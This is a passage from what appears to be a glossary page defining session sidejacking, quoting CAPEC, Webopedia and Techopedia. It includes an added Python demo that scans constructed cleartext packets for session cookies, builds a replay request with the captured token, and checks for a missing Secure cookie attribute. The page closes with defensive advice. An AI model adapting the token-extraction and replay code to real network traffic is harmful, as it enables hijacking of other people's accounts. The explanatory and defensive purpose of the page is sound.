practice related to Session hijacking, but generally with the attacker and the victim
on the same network. Attacks of this kind are very common on Wi-Fi hotspots
with no security enabled.
Session
sidejacking takes advantage of an unencrypted communication channel between a
victim and target system. The attacker sniffs traffic on a network looking for
session tokens in unencrypted traffic. Once a session token is captured, the
attacker performs malicious actions by using the stolen token with the targeted
application to impersonate the victim.
This attack is a
specific method of session hijacking, which is exploiting a valid session token
to gain unauthorized access to a target system or information. Other methods to
perform a session hijacking are session fixation, cross-site scripting, or
compromising a user or server machine and stealing the session token.
https://capec.mitre.org/data/definitions/
Term used to
describe the malicious act of hijacking an engaged Web session with a remote
service by intercepting and using the credentials that identified the
user/victim to that specific server. Typically, SideJacking is most common on
sites that require authentication through a username and password, such as
online Web mail accounts as well as social networking sites. SideJacking works
only if the site catches a non-SSL cookie, so any Web site that uses SSL
exclusively would be safe from SideJackers. SideJacking was first demonstrated
by Robert Graham, CEO of Errata Security at Black Hat in 2007.
http://www.webopedia.com/TERM/S/SideJacking.html
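The mechanism in the CAPEC entry above (sniff cleartext traffic for a session token, then reuse it against the application) and the Webopedia caveat that it only works when the browser will send the cookie without SSL, as an added Python example that is not part of this page or of any of the cited sources. The packet payloads, host names and cookie values are constructed for the example, and the list of session-cookie names is an assumption; on a real hotspot the payloads would come from a capture rather than a list of byte strings.

```python
"""Session sidejacking over cleartext HTTP: token extraction, replay, and the
Secure-attribute check that decides whether a cookie is exposed at all.
Added example; all traffic below is constructed, not captured."""
import re

# Assumption: cookie names that typically carry the session identifier.
SESSION_COOKIE_NAMES = {"PHPSESSID", "JSESSIONID", "sessionid", "session", "sid"}

# Constructed TCP payloads as a sniffer on an open hotspot would see them.
CAPTURED_PACKETS = [
    # victim's plaintext request to a webmail site, session cookie included
    b"GET /inbox HTTP/1.1\r\nHost: mail.example.test\r\n"
    b"Cookie: theme=dark; PHPSESSID=8f3a9c21\r\n\r\n",
    # start of a TLS ClientHello: opaque to the sniffer, no request line
    b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03" + b"\x00" * 10,
    # plaintext request that carries no session token
    b"GET / HTTP/1.1\r\nHost: news.example.test\r\nCookie: consent=1\r\n\r\n",
]
# Constructed Set-Cookie headers: the first is exposed on any HTTP request,
# the second is only ever sent over TLS because of the Secure attribute.
INSECURE_SET_COOKIE = "PHPSESSID=8f3a9c21; Path=/; HttpOnly"
SECURE_SET_COOKIE = "PHPSESSID=8f3a9c21; Path=/; Secure; HttpOnly"

REQUEST_LINE = re.compile(rb"^[A-Z]+ \S+ HTTP/1\.[01]\r\n")


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into request line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def parse_cookie_header(value: str) -> dict:
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            cookies[name] = val
    return cookies


def sidejack_candidates(packets: list) -> list:
    """Scan cleartext payloads for HTTP requests carrying a session cookie.

    Only payloads that begin with an HTTP request line are parsed; TLS
    records never match, which is exactly why an SSL-only site is out of
    reach for this attack."""
    found = []
    for payload in packets:
        if not REQUEST_LINE.match(payload):
            continue
        req = parse_http_request(payload)
        cookies = parse_cookie_header(req["headers"].get("cookie", ""))
        for name, val in cookies.items():
            if name in SESSION_COOKIE_NAMES:
                found.append({"host": req["headers"].get("host", ""),
                              "name": name, "value": val})
    return found


def replay_request(host: str, path: str, name: str, value: str) -> bytes:
    """Build the request an attacker would send with the stolen token."""
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {name}={value}\r\n"
            "Connection: close\r\n\r\n").encode()


def cookie_is_sidejackable(set_cookie: str) -> bool:
    """True when the Set-Cookie header lacks the Secure attribute, so the
    browser will also send the cookie on plain-HTTP requests."""
    attrs = {p.strip().split("=", 1)[0].lower() for p in set_cookie.split(";")[1:]}
    return "secure" not in attrs


if __name__ == "__main__":
    for hit in sidejack_candidates(CAPTURED_PACKETS):
        print("stolen token:", hit)
        print(replay_request(hit["host"], "/inbox", hit["name"], hit["value"]).decode())
    print("insecure cookie exposed:", cookie_is_sidejackable(INSECURE_SET_COOKIE))
    print("secure cookie exposed:", cookie_is_sidejackable(SECURE_SET_COOKIE))
```

The practitioner's check is the last function: a session cookie set without the Secure attribute is sent on every plain-HTTP request to the host, so a single cleartext hit (an image, a redirect, a mixed-content link) is enough to hand it to a sniffer even if the login itself went over TLS. Marking the session cookie Secure and serving the site over HTTPS only is what closes the attack described above.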
Sidejacking
refers to the use of unauthorized identification credentials to hijack a valid
Web session remotely in order to take over a specific Web server. Usually
sidejacking attacks are performed through accounts where the user types in
their username and password. Sidejacking attacks work to find a non-Secure
Sockets Layer (SSL) cookie. Usually, websites that have users type in their
usernames and passwords are the type that get sidejacked. Websites that use
SSL don't have as much of a chance of being sidejacked, but if the webmasters
neglect to authenticate the site itself through encryption, SSL use can be
negated. Unsecured Wi-Fi hot spots are also vulnerable.
http://www.techopedia.com/definition/4105/sidejacking
Related topics